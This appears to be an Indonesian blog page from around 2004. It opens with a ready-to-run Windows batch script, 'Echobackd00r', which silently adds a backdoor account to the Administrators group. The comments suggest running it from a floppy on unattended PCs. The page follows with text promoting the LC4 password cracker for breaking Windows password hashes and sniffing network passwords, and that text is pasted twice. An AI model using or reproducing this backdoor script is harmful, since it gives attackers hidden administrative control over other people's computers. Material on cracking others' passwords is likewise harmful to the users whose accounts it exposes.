rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal
rem *MULAI.
@echo off
PROMPT $P$G
cls
Color 87
GOto iklan
:setting
rem *ganti USER dan PASS
set USER="backdoor"
set PASS="password"
if %USER%=="backdoor" Goto gagal else GOto proses
:proses
rem *masuk ke perintah tuk nambahin user + passwordnya
net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete
cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat!
color 70
EXIT
:iklan
rem * just a banner from me :) , bisa di hilangkan :p
echo.
echo ###############################################################
echo # #
echo # Echobackd00r #
echo # created && tested by y3dips with XP OS #
echo # greetz to :the_day for idea, moby, z3r0byt3,comex, *PUJI #
echo # note: ubah USER dan PASS #
echo # #
echo ###############################################################
echo.
echo tekan ENTER !!!
pause>nul
Goto setting
:gagal
echo.
echo edit file echobackd00r.bat dan ubah USER dan PASSnya
echo.
rem *SELESAI.
rem *created by y3dips : maret 2004 : http://echo.or.id
Cara Cepat Bongkar Password
Ada cara cepat menerobos password windows ( termasuk jaringan windows ) saat anda lupa yakni menngunakan @stake LC4 (dulunya bernama L0pht Crack).
LC4 sanggup melawan mesin windows anda dengan sebuah kombinasi dari kamus dan serangan brutal orang2 usil.LC4 bisa mengcrack hampir semua password dalam hitungan detik saja.bahkan pada password yang terdiri dari angka dan karakter2 panjang.
Seperti diketahui Password windows Nt,2000,dan juga XP disimpan menggunakan sandi (encrypt) hash marks.LC4 sanggup membongkar hash marks tersebut dengan proses kerja ratusan password per menitnya.selanjtnya,password yang tepat akan dikirim dan ditampilkan ke layar monitor
Dalam sebuah perusahaan,LC4 bisa digunakan untuk mengakses PC karyawan.ia bisa digunakan untuk mengakses komputer dari user-user yang lupa dengan password-nya.maksudnya,System Administrators jaringan bisa mencari password yang lemah dalam beberapa menit.bahkan juga,sys admins bisa merubah password tersebut agar lebih aman
Kejelekan program pembongkar password ini,seseorang yang usil bisa menggunakan LC4 ini untuk mencium (Mengawasi) password2 dari user sebuah jaringan.bahkan,seorang hacker bisa memasang aplikasi primary domain controller dan menjegal ratusan password berharga hanya dalam hitungan menit.
Info dan Download Program LC4beserta versi evaluasi ini bisa diambil http://www.atstake.com/research/lc/
LC4 sanggup melawan mesin windows anda dengan sebuah kombinasi dari kamus dan serangan brutal orang2 usil.LC4 bisa mengcrack hampir semua password dalam hitungan detik saja.bahkan pada password yang terdiri dari angka dan karakter2 panjang.
Seperti diketahui Password windows Nt,2000,dan juga XP disimpan menggunakan sandi (encrypt) hash marks.LC4 sanggup membongkar hash marks tersebut dengan proses kerja ratusan password per menitnya.selanjtnya,password yang tepat akan dikirim dan ditampilkan ke layar monitor
Dalam sebuah perusahaan,LC4 bisa digunakan untuk mengakses PC karyawan.ia bisa digunakan untuk mengakses komputer dari user-user yang lupa dengan password-nya.maksudnya,System Administrators jaringan bisa mencari password yang lemah dalam beberapa menit.bahkan juga,sys admins bisa merubah password tersebut agar lebih aman
Kejelekan program pembongkar password ini,seseorang yang usil bisa menggunakan LC4 ini untuk mencium (Mengawasi) password2 dari user sebuah jaringan.bahkan,seorang hacker bisa memasang aplikasi primary domain controller dan menjegal ratusan password berharga hanya dalam hitungan menit.
Info dan Download Program LC4beserta versi evaluasi ini bisa diambil http://www.atstake.com/research/lc/
Langganan:
Postingan (Atom)